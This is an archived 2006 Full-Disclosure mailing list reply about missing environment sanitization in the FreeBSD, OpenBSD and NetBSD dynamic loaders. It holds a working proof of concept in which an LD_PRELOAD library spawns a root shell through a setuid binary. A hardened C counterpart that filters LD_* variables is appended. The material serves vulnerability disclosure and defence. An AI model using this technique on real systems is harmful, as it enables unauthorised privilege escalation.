lists.openwall.net: Open Source and information security mailing list archives
Date: Wed, 22 Nov 2006 23:04:12 +0100
From: "Tyop?" <tyoptyop@...il.com>
To: full-disclosure@...ts.grok.org.uk
Subject: Re: Lack of environment sanitization in the FreeBSD, OpenBSD, NetBSD dynamic loaders.

On 11/22/06, Tyop? <tyoptyop@...il.com> wrote:
> On 11/22/06, In Cognito <defend.the.world@...il.com> wrote:
> > Impact: Serious. May lead to privilege escalation.
> >
> > A class of security vulnerabilities has resurfaced in the dynamic loaders
> > of FreeBSD, OpenBSD, and NetBSD in the sanitization of environment
> > variables for suid and sgid binaries.
> >
> > Due to either badly implemented sanitization or a lack of it, a setuid
> > binary may execute other processes with a tainted environment.
> >
> > [...]
> >
> > Have fun! Stay safe!
> >
>
> Fun. Not "perfectly" safe.
>
> My experience :
>
> %id
> uid=0(root) gid=0(wheel) groups=0(wheel), 5(operator)
> %cat vuln.c
> main()
> {
>   setuid(0);
>   execl("/usr/bin/id","id",0);
> }
> %cc vuln.c -o vuln && chmod 4711 ./vuln
> %exit
> > id
> uid=1001(tyop) gid=1001(tyop) groups=1001(tyop)
> > ls -l vuln
> -rws--x--x 1 root tyop 4827 Nov 22 22:46 vuln
> > cat tyop.c
> __attribute__ ((constructor)) main()
> {
>   printf("[+] Hello from shared library land\n");
>   execle("/bin/sh","sh",0,0);
> }
> > cc -shared -o lib.so tyop.c
> > setenv LD_PRELOAD "/home/tyop/test/lib.so"
> > ./vuln
> [+] Hello from shared library land
> # id
> uid=0(root) gid=0(wheel) egid=1001(tyop) groups=1001(tyop)
> # echo "It works on `uname -sr`"
> It works on FreeBSD 7.0-CURRENT-200609
> #
>
> Have a nice day.

# echo "It works with vuln static too"
It works with vuln static too.

(sry for double post)

--
Tyop?

_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/
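A hardened counterpart to the vuln.c in the post, added here as an example and not the poster's code: the setuid program filters LD_* and similar variables out of its own environment before exec'ing the child, so a non-suid child such as /usr/bin/id does not inherit an attacker-controlled LD_PRELOAD (the case the "vuln static" remark exercises, where the loader never processes the suid binary itself). The prefix list is an assumption; filtering in main() cannot undo a preload that already ran inside the suid process, which only the loader can refuse.

```c
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <unistd.h>

extern char **environ;
/* Entries a privileged process must not pass to a child. The "LD_" prefix
 * covers LD_PRELOAD and LD_LIBRARY_PATH, which the post's demo relies on. */
static int is_unsafe_var(const char *entry)
{
    static const char *const prefixes[] = {
        "LD_", "DYLD_", "IFS=", "ENV=", "BASH_ENV="   /* assumed list */
    };
    for (size_t i = 0; i < sizeof prefixes / sizeof prefixes[0]; i++)
        if (strncmp(entry, prefixes[i], strlen(prefixes[i])) == 0)
            return 1;
    return 0;
}

/* Filtered, NULL-terminated copy of env; *kept receives the entry count. */
char **sanitize_env(char *const *env, size_t *kept)
{
    size_t n = 0, j = 0;
    while (env[n] != NULL) n++;
    char **out = calloc(n + 1, sizeof *out);
    if (out == NULL)
        return NULL;
    for (size_t i = 0; i < n; i++)
        if (!is_unsafe_var(env[i]))
            out[j++] = env[i];
    out[j] = NULL;
    if (kept != NULL)
        *kept = j;
    return out;
}

/* Like the post's vuln.c, but the child gets the filtered environment via
 * execve() instead of inheriting environ (and any LD_PRELOAD) via execl(). */
int main(void)
{
    size_t kept = 0;
    char **clean = sanitize_env(environ, &kept);
    if (clean == NULL)
        return 1;
    char *const argv[] = { "id", NULL };
    execve("/usr/bin/id", argv, clean);
    perror("execve");
    return 1;
}
```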